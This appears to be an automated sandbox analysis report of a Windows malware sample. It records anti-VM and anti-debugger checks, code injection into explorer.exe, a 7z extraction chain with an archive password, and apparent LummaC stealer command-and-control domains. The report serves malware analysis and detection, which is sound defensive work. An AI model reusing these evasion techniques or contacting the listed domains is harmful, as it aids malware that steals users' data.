Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Special instruction interceptor: First address: B37DAD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Special instruction interceptor: First address: CCD7FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Special instruction interceptor: First address: D62DF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Special instruction interceptor: First address: E32CA8 instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D304D9 rdtsc 0_2_04D304D9
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1272 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1271 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1415 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1399 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4565
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3977
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4389
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1522
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7948 Thread sleep count: 36 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7948 Thread sleep time: -72036s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7924 Thread sleep count: 1272 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7924 Thread sleep time: -2545272s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904 Thread sleep count: 287 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7904 Thread sleep time: -8610000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7944 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7944 Thread sleep time: -90045s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940 Thread sleep count: 1271 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7940 Thread sleep time: -2543271s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920 Thread sleep count: 1415 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7920 Thread sleep time: -2831415s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932 Thread sleep count: 1399 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7932 Thread sleep time: -2799399s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe TID: 7064 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe TID: 5936 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5844 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 4076 Thread sleep time: -450000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 4076 Thread sleep time: -30000s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Last function: Thread delayed
Source: C:\Program Files\Windows Media Player\graph\graph.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Publishers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\SolidDocuments Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: skotes.exe, skotes.exe, 00000006.00000000.2300264447.0000000000562000.00000080.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2987588956.0000000000562000.00000040.00000001.01000000.00000007.sdmp, 0516ff61af.exe, 00000007.00000002.2666217072.0000000000CAE000.00000040.00000001.01000000.00000009.sdmp, 1b73492cb0.exe, 0000002D.00000002.2989040800.0000000000D7E000.00000040.00000001.01000000.00000014.sdmp, file.exe, skotes.exe.0.dr Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0516ff61af.exe, 00000007.00000003.2478796488.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665798846.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2583228573.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667135562.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2501717799.00000000013D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWU
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ed15fdf974.exe, 0000002F.00000002.2988356074.00000000011FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW3n
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.00000000019C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu#V
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 0516ff61af.exe, 00000007.00000003.2478796488.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665798846.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2583228573.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665588166.000000000139A000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2666977755.000000000139A000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667135562.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2501717799.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000002.2715905894.000002479E9AC000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2674242407.000002479E9B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Gxtuum.exe, 00000031.00000002.2987689821.0000000001617000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: file.exe, 00000000.00000002.1759612145.0000000000A96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\4
Source: file.exe, skotes.exe.0.dr Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: PING.EXE, 00000029.00000002.2805830068.0000019C4C22B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PING.EXE, 0000002C.00000002.2810412359.0000016463CA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllnn
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D30A25 Start: 04D30A3A End: 04D30A34 0_2_04D30A25
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\explorer.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04D304D9 rdtsc 0_2_04D304D9
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DD652B mov eax, dword ptr fs:[00000030h] 0_2_00DD652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00DDA302 mov eax, dword ptr fs:[00000030h] 0_2_00DDA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0039A302 mov eax, dword ptr fs:[00000030h] 1_2_0039A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0039652B mov eax, dword ptr fs:[00000030h] 1_2_0039652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0039A302 mov eax, dword ptr fs:[00000030h] 2_2_0039A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0039652B mov eax, dword ptr fs:[00000030h] 2_2_0039652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0039A302 mov eax, dword ptr fs:[00000030h] 6_2_0039A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0039652B mov eax, dword ptr fs:[00000030h] 6_2_0039652B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
barindex
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 1800 base: 9E1010 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140000000 value: 4D
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140001000 value: 40
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 1402DD000 value: 58
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 14040B000 value: A4
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140739000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 14075E000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 14075F000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140762000 value: 48
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140764000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 140765000 value: 00
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Memory written: PID: 5416 base: 589010 value: 00
LummaC encrypted strings found
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: rapeflowwj.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: crosshuaht.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: sustainskelet.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: aspecteirs.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: energyaffai.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: necklacebudi.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: discokeyus.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: grannyejh.lat
Source: 0516ff61af.exe, 00000007.00000002.2666134637.0000000000AE1000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: cheapptaxysu.click
Source: ed15fdf974.exe, 0000002F.00000002.2988093513.0000000001100000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: treehoneyi.click
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 1800
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Thread register set: target process: 5416
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe "C:\Users\user\AppData\Local\Temp\1019522001\0516ff61af.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe "C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe "C:\Users\user\AppData\Local\Temp\1019524001\6eea3e30e9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe "C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe "C:\Users\user\AppData\Local\Temp\1019526001\1b73492cb0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe "C:\Users\user\AppData\Local\Temp\1019527001\ed15fdf974.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019523001\abcebc1047.exe Process created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019525001\8aec52a3fa.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 65,10
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: unknown unknown
Source: 0516ff61af.exe, 00000007.00000002.2666217072.0000000000CAE000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: BProgram Manager
Source: file.exe, 00000000.00000002.1761277016.0000000000FEA000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1799028306.00000000005AA000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1806385040.00000000005AA000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: uProgram Manager
Source: ed15fdf974.exe, 0000002F.00000002.2989587124.0000000001B20000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
